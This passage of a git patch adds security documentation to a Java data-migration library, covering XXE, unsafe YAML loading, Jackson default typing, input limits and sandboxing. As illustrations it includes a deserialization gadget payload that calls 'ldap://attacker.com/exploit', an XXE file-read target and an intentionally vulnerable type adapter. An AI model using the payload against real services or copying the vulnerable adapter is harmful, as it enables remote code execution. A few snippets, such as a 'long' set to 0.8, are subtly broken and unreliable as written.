nested.put("data", "nested-level-" + depth);
- nested.put("timestamp", System.currentTimeMillis());
+ nested.put("timestamp", FIXED_TIMESTAMP);
addNestedObject(nested, "child", depth - 1);
});
}
From f9df5c1391ba3ddc6cfe8e9ae3a4df5c57436999 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sat, 31 Jan 2026 22:02:18 +0100
Subject: [PATCH 26/39] Add security considerations and best practices for
processing XML and YAML, including examples and detailed mitigations against
XXE and RCE vulnerabilities. Introduce new security documentation sections
for serialization formats and updated threat model.
---
docs/README.md | 10 +
docs/codec/xml.md | 32 +
docs/codec/yaml.md | 26 +
docs/security/best-practices.md | 492 +++++++++++++
docs/security/format-considerations/gson.md | 309 +++++++++
docs/security/format-considerations/index.md | 105 +++
.../security/format-considerations/jackson.md | 328 +++++++++
.../format-considerations/snakeyaml.md | 316 +++++++++
docs/security/index.md | 118 ++++
.../security/secure-configuration-examples.md | 513 ++++++++++++++
docs/security/spring-security-integration.md | 649 ++++++++++++++++++
docs/security/threat-model.md | 278 ++++++++
12 files changed, 3176 insertions(+)
create mode 100644 docs/security/best-practices.md
create mode 100644 docs/security/format-considerations/gson.md
create mode 100644 docs/security/format-considerations/index.md
create mode 100644 docs/security/format-considerations/jackson.md
create mode 100644 docs/security/format-considerations/snakeyaml.md
create mode 100644 docs/security/index.md
create mode 100644 docs/security/secure-configuration-examples.md
create mode 100644 docs/security/spring-security-integration.md
create mode 100644 docs/security/threat-model.md
diff --git a/docs/README.md b/docs/README.md
index 482fbf0..700ede5 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -123,6 +123,16 @@ For experienced users:
- [Performance Optimization](advanced/performance-optimization.md)
- [Extending the Framework](advanced/extending-framework.md)
+### Security
+
+Guidance for processing untrusted data safely:
+
+- [Security Overview](security/index.md) — Introduction to security considerations
+- [Threat Model](security/threat-model.md) — Attack vectors and trust boundaries
+- [Format Security](security/format-considerations/index.md) — Per-format security guidance
+- [Best Practices](security/best-practices.md) — Secure configuration patterns
+- [Secure Configuration Examples](security/secure-configuration-examples.md) — Ready-to-use examples
+
### Spring Boot Integration
Seamlessly integrate Aether Datafixers into Spring Boot applications:
diff --git a/docs/codec/xml.md b/docs/codec/xml.md
index c50d77c..35e14cd 100644
--- a/docs/codec/xml.md
+++ b/docs/codec/xml.md
@@ -338,6 +338,38 @@ DataResult result = ServerConfig.CODEC.decode(JacksonXmlOps.INSTAN
ServerConfig config = result.getOrThrow();
```
+## Security Considerations
+
+> **WARNING:** XML processing is vulnerable to **XXE (XML External Entity)** attacks.
+> When processing untrusted XML, you **MUST** configure the `XmlMapper` to disable
+> external entity processing.
+
+**XXE attacks can:**
+- Read local files (`file:///etc/passwd`)
+- Perform Server-Side Request Forgery (SSRF)
+- Cause Denial of Service through entity expansion (Billion Laughs)
+
+**Secure configuration for untrusted XML:**
+
+```java
+XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+XmlMapper secureMapper = XmlMapper.builder(
+ XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .build()
+).build();
+
+JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper);
+```
+
+For detailed security guidance and configuration examples, see [Jackson XML Security](../security/format-considerations/jackson.md#xxe-prevention).
+
+---
+
## Best Practices
1. **Use Simple Structures** - Jackson XML works best with simple, well-structured XML
diff --git a/docs/codec/yaml.md b/docs/codec/yaml.md
index 33f997f..3ef29e4 100644
--- a/docs/codec/yaml.md
+++ b/docs/codec/yaml.md
@@ -132,6 +132,32 @@ Yaml yaml = new Yaml(new SafeConstructor(loaderOptions));
Object data = yaml.load(untrustedYaml);
```
+## Security Considerations
+
+> **WARNING:** When loading YAML from untrusted sources, you **MUST** use `SafeConstructor`
+> to prevent arbitrary code execution attacks. The default `Yaml()` constructor allows
+> instantiation of arbitrary Java classes, which can lead to **Remote Code Execution (RCE)**.
+
+**Critical security measures for untrusted YAML:**
+
+1. **Always use `SafeConstructor`** — Prevents arbitrary class instantiation
+2. **Limit alias expansion** — Set `maxAliasesForCollections` to prevent Billion Laughs attacks
+3. **Limit nesting depth** — Set `nestingDepthLimit` to prevent stack overflow
+4. **Limit input size** — Set `codePointLimit` to prevent memory exhaustion
+
+```java
+// Secure configuration for untrusted YAML
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+options.setCodePointLimit(3 * 1024 * 1024);
+options.setAllowDuplicateKeys(false);
+
+Yaml safeYaml = new Yaml(new SafeConstructor(options));
+```
+
+For detailed security guidance, see [SnakeYAML Security](../security/format-considerations/snakeyaml.md).
+
### Data Types
SnakeYamlOps works with native Java types:
diff --git a/docs/security/best-practices.md b/docs/security/best-practices.md
new file mode 100644
index 0000000..dc04f4a
--- /dev/null
+++ b/docs/security/best-practices.md
@@ -0,0 +1,492 @@
+# Security Best Practices
+
+This document provides general security best practices for processing untrusted data with Aether Datafixers. These practices apply across all serialization formats.
+
+## Defense in Depth
+
+Security should be implemented in layers. No single control is sufficient—combine multiple measures:
+
+1. **Input Validation** — Check size and format before parsing
+2. **Safe Parser Configuration** — Use security-hardened parser settings
+3. **Resource Limits** — Enforce depth, size, and time limits
+4. **Monitoring** — Log and alert on suspicious activity
+5. **Sandboxing** — Isolate high-risk processing
+
+---
+
+## Input Validation Before Migration
+
+### Size Validation
+
+Always validate input size before parsing:
+
+```java
+public class InputValidator {
+
+ private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB
+
+ public void validateSize(byte[] input) {
+ if (input == null) {
+ throw new IllegalArgumentException("Input cannot be null");
+ }
+ if (input.length > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload size " + input.length + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ public void validateSize(String input) {
+ if (input == null) {
+ throw new IllegalArgumentException("Input cannot be null");
+ }
+ if (input.length() > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload size " + input.length() + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ public void validateSize(InputStream input, long contentLength) {
+ if (contentLength > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Content-Length " + contentLength + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+ }
+ }
+}
+```
+
+### Size-Limited InputStream
+
+For streaming scenarios, wrap the input stream:
+
+```java
+public class SizeLimitedInputStream extends FilterInputStream {
+
+ private final long maxSize;
+ private long bytesRead = 0;
+
+ public SizeLimitedInputStream(InputStream in, long maxSize) {
+ super(in);
+ this.maxSize = maxSize;
+ }
+
+ @Override
+ public int read() throws IOException {
+ int b = super.read();
+ if (b != -1) {
+ bytesRead++;
+ checkLimit();
+ }
+ return b;
+ }
+
+ @Override
+ public int read(byte[] b, int off, int len) throws IOException {
+ int n = super.read(b, off, len);
+ if (n > 0) {
+ bytesRead += n;
+ checkLimit();
+ }
+ return n;
+ }
+
+ private void checkLimit() throws IOException {
+ if (bytesRead > maxSize) {
+ throw new IOException("Input exceeds maximum size of " + maxSize + " bytes");
+ }
+ }
+}
+
+// Usage
+InputStream limited = new SizeLimitedInputStream(userInput, 10 * 1024 * 1024);
+Object data = yaml.load(limited);
+```
+
+---
+
+## Depth and Nesting Limits
+
+Deep nesting can cause stack overflow or excessive memory consumption.
+
+### Parser-Level Limits (Preferred)
+
+Use built-in parser limits when available:
+
+```java
+// Jackson
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .build();
+
+// SnakeYAML
+LoaderOptions options = new LoaderOptions();
+options.setNestingDepthLimit(50);
+```
+
+### Application-Level Validation
+
+For parsers without built-in limits, validate after parsing:
+
+```java
+public class DepthValidator {
+
+ private static final int MAX_DEPTH = 50;
+
+ public void validateDepth(Dynamic> dynamic) {
+ validateDepth(dynamic, 0);
+ }
+
+ private void validateDepth(Dynamic> dynamic, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("Data exceeds maximum depth of " + MAX_DEPTH);
+ }
+
+ // Check map entries
+ dynamic.getMap().result().ifPresent(map -> {
+ map.values().forEach(value -> validateDepth(value, depth + 1));
+ });
+
+ // Check list elements
+ dynamic.getList().result().ifPresent(list -> {
+ list.forEach(element -> validateDepth(element, depth + 1));
+ });
+ }
+}
+```
+
+---
+
+## Timeout Configuration
+
+Long-running migrations can be exploited for DoS. Implement timeouts:
+
+```java
+import java.util.concurrent.*;
+
+public class TimedMigrationService {
+
+ private final AetherDataFixer fixer;
+ private final ExecutorService executor;
+ private final Duration timeout;
+
+ public TimedMigrationService(AetherDataFixer fixer, Duration timeout) {
+ this.fixer = fixer;
+ this.executor = Executors.newCachedThreadPool();
+ this.timeout = timeout;
+ }
+
+ public TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input,
+ DataVersion from,
+ DataVersion to) throws TimeoutException {
+
+ Future> future = executor.submit(
+ () -> fixer.update(input, from, to)
+ );
+
+ try {
+ return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ future.cancel(true);
+ throw new MigrationTimeoutException(
+ "Migration timed out after " + timeout, e);
+ } catch (InterruptedException e) {
+ Thread.currentThread().interrupt();
+ throw new MigrationException("Migration interrupted", e);
+ } catch (ExecutionException e) {
+ throw new MigrationException("Migration failed", e.getCause());
+ }
+ }
+
+ public void shutdown() {
+ executor.shutdown();
+ }
+}
+```
+
+### Virtual Threads (Java 21+)
+
+With Java 21+, use virtual threads for better resource efficiency:
+
+```java
+public class VirtualThreadMigrationService {
+
+ private final AetherDataFixer fixer;
+ private final Duration timeout;
+
+ public VirtualThreadMigrationService(AetherDataFixer fixer, Duration timeout) {
+ this.fixer = fixer;
+ this.timeout = timeout;
+ }
+
+ public TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input,
+ DataVersion from,
+ DataVersion to) throws TimeoutException {
+
+ try (var executor = Executors.newVirtualThreadPerTaskExecutor()) {
+ Future> future = executor.submit(
+ () -> fixer.update(input, from, to)
+ );
+ return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ throw new MigrationTimeoutException("Migration timed out", e);
+ } catch (Exception e) {
+ throw new MigrationException("Migration failed", e);
+ }
+ }
+}
+```
+
+---
+
+## Memory Limits
+
+Limit JVM memory to contain resource exhaustion attacks:
+
+```bash
+# Limit heap size
+java -Xmx512m -Xms256m -jar application.jar
+
+# Enable GC logging for monitoring
+java -Xlog:gc*:file=gc.log:time -jar application.jar
+```
+
+### Monitoring Memory During Migration
+
+```java
+public class MemoryMonitor {
+
+ private static final long WARNING_THRESHOLD = 0.8; // 80% of max heap
+
+ public void checkMemoryBeforeMigration() {
+ Runtime runtime = Runtime.getRuntime();
+ long maxMemory = runtime.maxMemory();
+ long usedMemory = runtime.totalMemory() - runtime.freeMemory();
+
+ if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) {
+ // Trigger GC and recheck
+ System.gc();
+ usedMemory = runtime.totalMemory() - runtime.freeMemory();
+
+ if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) {
+ throw new InsufficientMemoryException(
+ "Insufficient memory for migration. Used: " +
+ usedMemory + "/" + maxMemory);
+ }
+ }
+ }
+}
+```
+
+---
+
+## Sandboxing Strategies
+
+For high-risk scenarios, isolate migration processing:
+
+### Process Isolation
+
+Run migrations in a separate process with limited privileges:
+
+```java
+public class ProcessIsolatedMigration {
+
+ public String migrateInSandbox(String input, String bootstrapClass) throws Exception {
+ ProcessBuilder pb = new ProcessBuilder(
+ "java",
+ "-Xmx256m",
+ "-cp", "migration-worker.jar",
+ "com.example.MigrationWorker",
+ bootstrapClass
+ );
+
+ pb.environment().put("JAVA_TOOL_OPTIONS", ""); // Clear environment
+ pb.redirectErrorStream(true);
+
+ Process process = pb.start();
+ process.getOutputStream().write(input.getBytes());
+ process.getOutputStream().close();
+
+ if (!process.waitFor(30, TimeUnit.SECONDS)) {
+ process.destroyForcibly();
+ throw new TimeoutException("Migration process timed out");
+ }
+
+ return new String(process.getInputStream().readAllBytes());
+ }
+}
+```
+
+### Container Isolation
+
+Use container limits for production:
+
+```yaml
+# docker-compose.yml
+services:
+ migration-worker:
+ image: migration-service
+ deploy:
+ resources:
+ limits:
+ memory: 512M
+ cpus: '0.5'
+ security_opt:
+ - no-new-privileges:true
+ read_only: true
+```
+
+---
+
+## Defense-in-Depth Checklist
+
+Before processing untrusted data, verify:
+
+### Input Validation
+- [ ] Input size is checked before parsing
+- [ ] Content-Type header matches expected format
+- [ ] Input encoding is validated (UTF-8)
+
+### Parser Configuration
+- [ ] YAML: Using `SafeConstructor`
+- [ ] YAML: Alias limit configured (`maxAliasesForCollections`)
+- [ ] XML: External entities disabled
+- [ ] XML: DTD processing disabled
+- [ ] Jackson: Default typing is NOT enabled
+- [ ] All: Nesting depth limits configured
+
+### Resource Limits
+- [ ] Timeout configured for migration operations
+- [ ] Memory limits set on JVM/container
+- [ ] Rate limiting applied for user requests
+
+### Monitoring
+- [ ] Failed migrations are logged
+- [ ] Large payloads trigger alerts
+- [ ] Timeout events are tracked
+- [ ] Memory usage is monitored
+
+### Error Handling
+- [ ] Errors don't expose internal details
+- [ ] Stack traces are not sent to clients
+- [ ] Sensitive data is not logged
+
+---
+
+## Logging Security Events
+
+Log security-relevant events for monitoring:
+
+```java
+public class SecureMigrationService {
+
+ private static final Logger SECURITY_LOG = LoggerFactory.getLogger("SECURITY");
+
+ public TaggedDynamic migrate(TaggedDynamic input, DataVersion from, DataVersion to) {
+ long startTime = System.currentTimeMillis();
+
+ try {
+ TaggedDynamic result = fixer.update(input, from, to);
+ SECURITY_LOG.info("Migration success: type={}, from={}, to={}, duration={}ms",
+ input.type().id(), from.version(), to.version(),
+ System.currentTimeMillis() - startTime);
+ return result;
+ } catch (SecurityException e) {
+ SECURITY_LOG.warn("Migration blocked: type={}, reason={}",
+ input.type().id(), e.getMessage());
+ throw e;
+ } catch (Exception e) {
+ SECURITY_LOG.error("Migration failed: type={}, error={}",
+ input.type().id(), e.getMessage());
+ throw e;
+ }
+ }
+}
+```
+
+---
+
+## Complete Secure Migration Service
+
+Combining all best practices:
+
+```java
+public class SecureMigrationService {
+
+ private static final Logger LOG = LoggerFactory.getLogger(SecureMigrationService.class);
+ private static final long MAX_SIZE = 10 * 1024 * 1024;
+ private static final int MAX_DEPTH = 50;
+ private static final Duration TIMEOUT = Duration.ofSeconds(30);
+
+ private final AetherDataFixer fixer;
+ private final ExecutorService executor;
+
+ public SecureMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+ this.executor = Executors.newCachedThreadPool();
+ }
+
+ public TaggedDynamic migrateSecurely(
+ byte[] untrustedInput,
+ DynamicOps ops,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) {
+
+ // 1. Size validation
+ if (untrustedInput.length > MAX_SIZE) {
+ throw new PayloadTooLargeException("Input exceeds " + MAX_SIZE + " bytes");
+ }
+
+ // 2. Parse with safe configuration (format-specific)
+ T parsed = parseSecurely(untrustedInput, ops);
+
+ // 3. Depth validation
+ Dynamic dynamic = new Dynamic<>(ops, parsed);
+ validateDepth(dynamic, 0);
+
+ // 4. Migrate with timeout
+ TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic);
+ return migrateWithTimeout(tagged, from, to);
+ }
+
+ private T parseSecurely(byte[] input, DynamicOps ops) {
+ // Implementation depends on ops type
+ // See format-specific guides
+ throw new UnsupportedOperationException("Implement for specific ops");
+ }
+
+ private void validateDepth(Dynamic> dynamic, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("Exceeds max depth");
+ }
+ dynamic.getMap().result().ifPresent(map ->
+ map.values().forEach(v -> validateDepth(v, depth + 1)));
+ dynamic.getList().result().ifPresent(list ->
+ list.forEach(e -> validateDepth(e, depth + 1)));
+ }
+
+ private TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input, DataVersion from, DataVersion to) {
+ Future> future = executor.submit(
+ () -> fixer.update(input, from, to));
+ try {
+ return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ future.cancel(true);
+ throw new MigrationTimeoutException("Timeout", e);
+ } catch (Exception e) {
+ throw new MigrationException("Failed", e);
+ }
+ }
+}
+```
+
+---
+
+## Related
+
+- [Threat Model](threat-model.md)
+- [Format-Specific Security](format-considerations/index.md)
+- [Secure Configuration Examples](secure-configuration-examples.md)
+- [Spring Security Integration](spring-security-integration.md)
diff --git a/docs/security/format-considerations/gson.md b/docs/security/format-considerations/gson.md
new file mode 100644
index 0000000..bbc497c
--- /dev/null
+++ b/docs/security/format-considerations/gson.md
@@ -0,0 +1,309 @@
+# Gson Security
+
+Gson is a relatively safe JSON library with a minimal attack surface. It does not support polymorphic deserialization by default, making it less susceptible to the deserialization attacks that affect other libraries.
+
+## Overview
+
+| Risk | Severity | Mitigation |
+|-----------------------------|----------|----------------------------------|
+| Large Payload DoS | Medium | Pre-validate size before parsing |
+| Deep Nesting Stack Overflow | Medium | Validate nesting depth |
+| Custom TypeAdapter Risks | Low | Review custom adapters carefully |
+
+## Safe by Default
+
+Unlike Jackson, Gson does **not** support polymorphic deserialization by default:
+
+```java
+// This is SAFE - Gson doesn't instantiate arbitrary classes
+Gson gson = new Gson();
+MyClass obj = gson.fromJson(untrustedJson, MyClass.class);
+```
+
+Gson only deserializes to the explicitly specified type (`MyClass`), not types specified in the JSON payload.
+
+## Potential Risks
+
+### Large Payload DoS
+
+Gson will attempt to parse any JSON regardless of size. Very large payloads can cause memory exhaustion:
+
+```java
+// No built-in size limits
+Gson gson = new Gson();
+// This will try to parse a 1GB JSON string
+JsonElement element = JsonParser.parseString(hugeJson); // Potential OOM
+```
+
+### Deep Nesting Stack Overflow
+
+Deeply nested JSON can cause stack overflow during parsing:
+
+```json
+{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":...}}}}}}}}}
+```
+
+---
+
+## Secure Configuration
+
+### Pre-Validation Before Parsing
+
+Always validate input before parsing:
+
+```java
+public class SecureGsonParser {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB
+ private static final int MAX_DEPTH = 50;
+
+ private final Gson gson;
+
+ public SecureGsonParser() {
+ this.gson = new GsonBuilder()
+ .disableHtmlEscaping() // Optional: for data migration
+ .create();
+ }
+
+ public JsonElement parse(String json) {
+ // Validate size
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size");
+ }
+
+ // Parse
+ JsonElement element = JsonParser.parseString(json);
+
+ // Validate depth
+ validateDepth(element, 0);
+
+ return element;
+ }
+
+ private void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum nesting depth");
+ }
+
+ if (element.isJsonObject()) {
+ for (Map.Entry entry : element.getAsJsonObject().entrySet()) {
+ validateDepth(entry.getValue(), depth + 1);
+ }
+ } else if (element.isJsonArray()) {
+ for (JsonElement item : element.getAsJsonArray()) {
+ validateDepth(item, depth + 1);
+ }
+ }
+ }
+}
+```
+
+### Integration with GsonOps
+
+```java
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+
+public class SecureGsonMigration {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024;
+ private static final int MAX_DEPTH = 50;
+
+ public Dynamic parseSecurely(String json) {
+ // 1. Size validation
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size");
+ }
+
+ // 2. Parse
+ JsonElement element = JsonParser.parseString(json);
+
+ // 3. Depth validation
+ validateDepth(element, 0);
+
+ // 4. Wrap in Dynamic
+ return new Dynamic<>(GsonOps.INSTANCE, element);
+ }
+
+ private void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum nesting depth");
+ }
+
+ if (element.isJsonObject()) {
+ element.getAsJsonObject().entrySet()
+ .forEach(e -> validateDepth(e.getValue(), depth + 1));
+ } else if (element.isJsonArray()) {
+ element.getAsJsonArray()
+ .forEach(e -> validateDepth(e, depth + 1));
+ }
+ }
+}
+```
+
+---
+
+## Streaming Parser for Large Files
+
+For very large files, use Gson's streaming API with validation:
+
+```java
+import com.google.gson.stream.JsonReader;
+
+public class StreamingGsonParser {
+
+ private static final int MAX_DEPTH = 50;
+ private int currentDepth = 0;
+
+ public void parseWithDepthLimit(Reader input) throws IOException {
+ try (JsonReader reader = new JsonReader(input)) {
+ parseValue(reader);
+ }
+ }
+
+ private void parseValue(JsonReader reader) throws IOException {
+ switch (reader.peek()) {
+ case BEGIN_OBJECT -> {
+ checkDepth();
+ currentDepth++;
+ reader.beginObject();
+ while (reader.hasNext()) {
+ reader.nextName();
+ parseValue(reader);
+ }
+ reader.endObject();
+ currentDepth--;
+ }
+ case BEGIN_ARRAY -> {
+ checkDepth();
+ currentDepth++;
+ reader.beginArray();
+ while (reader.hasNext()) {
+ parseValue(reader);
+ }
+ reader.endArray();
+ currentDepth--;
+ }
+ case STRING -> reader.nextString();
+ case NUMBER -> reader.nextDouble();
+ case BOOLEAN -> reader.nextBoolean();
+ case NULL -> reader.nextNull();
+ default -> throw new IllegalStateException("Unexpected token");
+ }
+ }
+
+ private void checkDepth() {
+ if (currentDepth >= MAX_DEPTH) {
+ throw new SecurityException("Maximum nesting depth exceeded");
+ }
+ }
+}
+```
+
+---
+
+## Custom TypeAdapter Security
+
+If you use custom `TypeAdapter` implementations, review them for security:
+
+```java
+// DANGEROUS - Deserializes arbitrary classes
+public class UnsafeTypeAdapter extends TypeAdapter {
+ @Override
+ public Object read(JsonReader in) {
+ String className = in.nextString();
+ return Class.forName(className).newInstance(); // VULNERABLE!
+ }
+}
+
+// SAFE - Only handles known types
+public class SafeTypeAdapter extends TypeAdapter {
+ @Override
+ public MyClass read(JsonReader in) {
+ // Only deserialize to MyClass, not arbitrary types
+ return new MyClass(in.nextString());
+ }
+}
+```
+
+---
+
+## Complete Secure Service
+
+```java
+public class SecureGsonMigrationService {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024;
+ private static final int MAX_DEPTH = 50;
+
+ private final AetherDataFixer fixer;
+ private final Gson gson;
+
+ public SecureGsonMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+ this.gson = new GsonBuilder().create();
+ }
+
+ public TaggedDynamic migrate(
+ String untrustedJson,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) {
+
+ // Validate
+ validateInput(untrustedJson);
+
+ // Parse
+ JsonElement element = JsonParser.parseString(untrustedJson);
+ validateDepth(element, 0);
+
+ // Migrate
+ Dynamic dynamic = new Dynamic<>(GsonOps.INSTANCE, element);
+ TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic);
+ return fixer.update(tagged, from, to);
+ }
+
+ private void validateInput(String json) {
+ if (json == null || json.isEmpty()) {
+ throw new IllegalArgumentException("JSON input cannot be null or empty");
+ }
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE + " bytes");
+ }
+ }
+
+ private void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH);
+ }
+ if (element.isJsonObject()) {
+ element.getAsJsonObject().entrySet()
+ .forEach(e -> validateDepth(e.getValue(), depth + 1));
+ } else if (element.isJsonArray()) {
+ element.getAsJsonArray()
+ .forEach(e -> validateDepth(e, depth + 1));
+ }
+ }
+}
+```
+
+---
+
+## Comparison with Jackson
+
+| Feature | Gson | Jackson |
+|--------------------------------|---------------------------|---------------------------------|
+| Polymorphic Deserialization | Not supported by default | Opt-in (dangerous if enabled) |
+| Built-in Size Limits | No | Yes (StreamReadConstraints) |
+| Built-in Depth Limits | No | Yes (StreamReadConstraints) |
+| Attack Surface | Small | Larger |
+| Recommended for Untrusted Data | Yes (with pre-validation) | Yes (with proper configuration) |
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [JSON Support](../../codec/json.md)
+- [Secure Configuration Examples](../secure-configuration-examples.md)
diff --git a/docs/security/format-considerations/index.md b/docs/security/format-considerations/index.md
new file mode 100644
index 0000000..1e90c8c
--- /dev/null
+++ b/docs/security/format-considerations/index.md
@@ -0,0 +1,105 @@
+# Format-Specific Security Considerations
+
+Each serialization format supported by Aether Datafixers has unique security characteristics. This section provides detailed guidance for secure configuration of each format.
+
+## Risk Summary
+
+| Format | Library | Risk Level | Primary Concerns |
+|--------|-----------|--------------|-----------------------------------------------|
+| YAML | SnakeYAML | **Critical** | Arbitrary code execution, Billion Laughs |
+| YAML | Jackson | Low-Medium | Depth limits only |
+| XML | Jackson | **High** | XXE, Entity expansion |
+| JSON | Jackson | Medium | Polymorphic typing (if enabled), depth limits |
+| JSON | Gson | Low | Minimal attack surface |
+| TOML | Jackson | Low | Limited attack surface |
+
+## Format-Specific Guides
+
+### [SnakeYAML Security](snakeyaml.md)
+
+**Risk Level: Critical**
+
+SnakeYAML's default configuration allows arbitrary Java class instantiation, making it extremely dangerous for untrusted input. This guide covers:
+
+- Arbitrary code execution prevention
+- Billion Laughs attack mitigation
+- Safe `LoaderOptions` configuration
+- Complete secure setup example
+
+### [Jackson Security](jackson.md)
+
+**Risk Level: Medium-High (format dependent)**
+
+Jackson is used for JSON, YAML, XML, and TOML. Security considerations vary by format:
+
+- **JSON:** Polymorphic deserialization risks
+- **YAML:** Fewer risks than SnakeYAML (no arbitrary constructors)
+- **XML:** XXE vulnerabilities
+- **All:** Depth and size limits
+
+### [Gson Security](gson.md)
+
+**Risk Level: Low**
+
+Gson has a relatively small attack surface by default. This guide covers:
+
+- Safe default behavior
+- Pre-validation recommendations
+- Depth validation patterns
+
+## Quick Reference
+
+### SnakeYAML: Always Use SafeConstructor
+
+```java
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+
+Yaml safeYaml = new Yaml(new SafeConstructor(options));
+```
+
+### Jackson XML: Disable External Entities
+
+```java
+XMLInputFactory xmlFactory = XMLInputFactory.newFactory();
+xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+```
+
+### Jackson JSON: Configure Read Constraints
+
+```java
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .maxStringLength(1_000_000)
+ .build();
+```
+
+### Jackson: Never Enable Default Typing
+
+```java
+// DANGEROUS - Never do this with untrusted data:
+// mapper.enableDefaultTyping();
+
+// DANGEROUS - Also avoid:
+// mapper.activateDefaultTyping(mapper.getPolymorphicTypeValidator());
+```
+
+## Decision Matrix
+
+Use this matrix to determine which security measures to apply:
+
+| Data Source | SnakeYAML | Jackson JSON | Jackson XML | Gson |
+|-------------------|--------------------------|-----------------|----------------|----------------|
+| User uploads | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation |
+| External APIs | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation |
+| Message queues | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation |
+| Internal services | Consider SafeConstructor | Optional limits | XXE prevention | Default OK |
+| Local config | Default OK | Default OK | Default OK | Default OK |
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [Secure Configuration Examples](../secure-configuration-examples.md)
diff --git a/docs/security/format-considerations/jackson.md b/docs/security/format-considerations/jackson.md
new file mode 100644
index 0000000..1fc7cac
--- /dev/null
+++ b/docs/security/format-considerations/jackson.md
@@ -0,0 +1,328 @@
+# Jackson Security
+
+Jackson is used by Aether Datafixers for JSON, YAML, XML, and TOML via `JacksonJsonOps`, `JacksonYamlOps`, `JacksonXmlOps`, and `JacksonTomlOps`. Each format has specific security considerations.
+
+## Overview
+
+| Format | Ops Class | Risk Level | Key Concerns |
+|--------|------------------|------------|-------------------------------------|
+| JSON | `JacksonJsonOps` | Medium | Polymorphic typing, resource limits |
+| YAML | `JacksonYamlOps` | Low-Medium | Fewer features than SnakeYAML |
+| XML | `JacksonXmlOps` | **High** | XXE, Entity expansion |
+| TOML | `JacksonTomlOps` | Low | Minimal attack surface |
+
+---
+
+## Polymorphic Deserialization
+
+### The Vulnerability
+
+Jackson's "default typing" feature allows JSON to specify which Java class to instantiate. This is extremely dangerous with untrusted input:
+
+```java
+// DANGEROUS - Never do this with untrusted data
+ObjectMapper mapper = new ObjectMapper();
+mapper.enableDefaultTyping(); // VULNERABLE!
+```
+
+Attackers can exploit this to execute arbitrary code:
+
+```json
+{
+ "@class": "com.sun.rowset.JdbcRowSetImpl",
+ "dataSourceName": "ldap://attacker.com/exploit",
+ "autoCommit": true
+}
+```
+
+### Safe Configuration
+
+**Never enable default typing for untrusted data:**
+
+```java
+// SAFE - Default configuration (no polymorphic typing)
+ObjectMapper mapper = new ObjectMapper();
+// Do NOT call enableDefaultTyping() or activateDefaultTyping()
+```
+
+**If polymorphic typing is absolutely required**, use an allowlist:
+
+```java
+ObjectMapper mapper = new ObjectMapper();
+mapper.activateDefaultTyping(
+ BasicPolymorphicTypeValidator.builder()
+ .allowIfSubType(SafeBaseClass.class) // Only allow specific types
+ .build(),
+ ObjectMapper.DefaultTyping.NON_FINAL
+);
+```
+
+---
+
